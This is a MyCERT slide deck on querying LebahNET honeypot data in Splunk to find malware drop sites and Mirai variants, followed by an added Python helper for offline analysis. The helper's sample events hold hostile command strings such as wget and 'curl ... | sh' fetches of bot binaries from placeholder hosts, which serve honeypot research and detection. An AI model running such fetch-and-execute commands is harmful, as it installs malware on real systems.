Splunking Lebahnet
- 1. Copyright © 2018 CyberSecurity Malaysia
SPLUNKING LEBAHNET (HONEYNET)
- 2. Content
• Background
• Problem
• Architecture Design
• Case Study
• Moving Forward
- 3. /usr/bin/whoami
Zuhair
• Executive turned Analyst (recently) at MyCERT.
• Working on Mobile Threat Research.
• Also happens to “play” with honeypot technology.
Fathi Kamil @ Fatah
• Acting Manager at Cyber Threat Research Center, MyCERT.
• Technical Lead for the Malware Mitigation WG
• LebahNET Honeypot Project
• Coordinated Malware Eradication and Remediation Platform.
- 4. Background
LebahNET is MyCERT’s honeypot project, set up to study how exploits function and to collect malware binaries.
A honeypot is a software mechanism set up to mimic a legitimate system, luring malicious software into believing it has found a legitimate target that is vulnerable to attack.
Honeypots allow researchers to detect, monitor and counter malicious activity by understanding what happens during the intrusion phase and what the attack payload does.
- 6. Problem Statement
• Large volumes of fixed-structure data, in which the important values are not represented as attributes.
- 7. What We Do
• In short, throw everything into Splunk.
• Query it and show what is actually in the data.
- 10. Case Study
• Enrich IP to geolocation directly
– sensor.protocol=httpd AND metadata.http_method=GET | rex field=metadata.url_path "https?://(?<domain>[^/]+)/[^?\s]+" | iplocation domain | top Country
- 11. Case Study
• Extract the list of drop-site URIs and POST_DATA
– host=lebahnetv2 AND sensor.protocol=httpd AND metadata.http_method=POST AND metadata.headers.Host=* | top limit=20 "metadata.headers.Host"
- 12. Case Study
• Top MySQL attacks by country
– attack_type=mysqlcmd AND sys_eval AND http | rex field=metadata.args "https?://(?<domain>[^/]+)/[^?\s]+" | iplocation domain | top Country
- 14. Binaries Collected
• attack_type=fileupload | timechart count by metadata.md5 usenull=f useother=f
- 15. IoT – Mirai Variant
Search for the keyword “Shinka” in your honeypot data!
- 16. Mirai variant
• shinka AND metadata.http_method=GET | rex field=metadata.url_path "https?://(?<domain>[^/]+)/[^?\s]+" | iplocation domain | top Country
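As an added example (not from the slides or the LebahNET project), the same drop-site extraction the rex on slides 10, 12 and 16 performs, done offline in Python over constructed sample events in the field layout those searches query. It also separates hosts that `iplocation` can geolocate (IP literals) from hostnames, for which `iplocation` returns no location and a DNS lookup is needed first.

```python
import re
import ipaddress
from collections import Counter

# Same pattern as the slides' rex; [^?\s]+ stops the path at whitespace or a query string.
DROP_URL_RE = re.compile(r"https?://(?P<domain>[^/]+)/[^?\s]+")

# Constructed sample events in the field layout the slides query (not LebahNET data).
SAMPLE_EVENTS = [
    {"sensor": {"protocol": "httpd"}, "metadata": {"http_method": "GET",
        "url_path": "/cgi-bin/x;wget http://203.0.113.10/shinka.arm7 -O /tmp/x"}},
    {"sensor": {"protocol": "httpd"}, "metadata": {"http_method": "GET",
        "url_path": "/index.php?p=http://203.0.113.10/shinka.mips"}},
    {"sensor": {"protocol": "httpd"}, "metadata": {"http_method": "GET",
        "url_path": "/?cmd=curl http://cdn.example.net/bins/ecchi.x86 | sh"}},
    {"sensor": {"protocol": "mysqld"}, "metadata": {"attack_type": "mysqlcmd",
        "args": "select sys_eval('wget http://198.51.100.7/mysql.bin')"}},
    {"sensor": {"protocol": "httpd"}, "metadata": {"http_method": "POST",
        "url_path": "/gate.php", "headers": {"Host": "203.0.113.10"}}},
]

def drop_hosts(events, keyword=None):
    """Emulate the rex over metadata.url_path (slides 10, 16) and over
    metadata.args for mysqlcmd events (slide 12); keyword mirrors slide 16's
    leading 'shinka AND ...' term. Returns Counter{host: hits}, like `top`."""
    hosts = Counter()
    for ev in events:
        md = ev["metadata"]
        # GET requests carry the payload in the URL; MySQL attacks carry it in args.
        field = md.get("url_path") if md.get("http_method") == "GET" else md.get("args")
        if not field or (keyword and keyword.lower() not in field.lower()):
            continue
        m = DROP_URL_RE.search(field)
        if m:
            hosts[m.group("domain")] += 1
    return hosts

def geolocatable(hosts):
    """iplocation geolocates IP literals only: split out hostnames, which need a
    DNS lookup (ideally at attack time) before they can be mapped to a country."""
    ips, names = Counter(), Counter()
    for host, hits in hosts.items():
        try:
            ipaddress.ip_address(host)  # raises ValueError for a hostname or host:port
            ips[host] += hits
        except ValueError:
            names[host] += hits
    return ips, names
```

`drop_hosts(SAMPLE_EVENTS).most_common(20)` gives the same ranking as the slides' `top`, and `geolocatable(...)` tells you which of those hosts the `iplocation` step will actually place on the map.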
- 17. IoT – Mirai Variant
Search for the keyword “ecchi”
- 18. Caveat
• Splunk does not “auto-magically” solve your data correlation problem.
- 19. What is Next after Splunk
• Continue paying the license if it is still affordable or…
• …go for ELK
• More detailed analysis of LebahNET data
– Better statistics to show attacks
– Extract more information from the metadata
- 20. LebahNET Participation
• Part of the Malware Mitigation Working Group in APCERT.
Editor's Notes
- Dionaea, Cowrie, Glastopf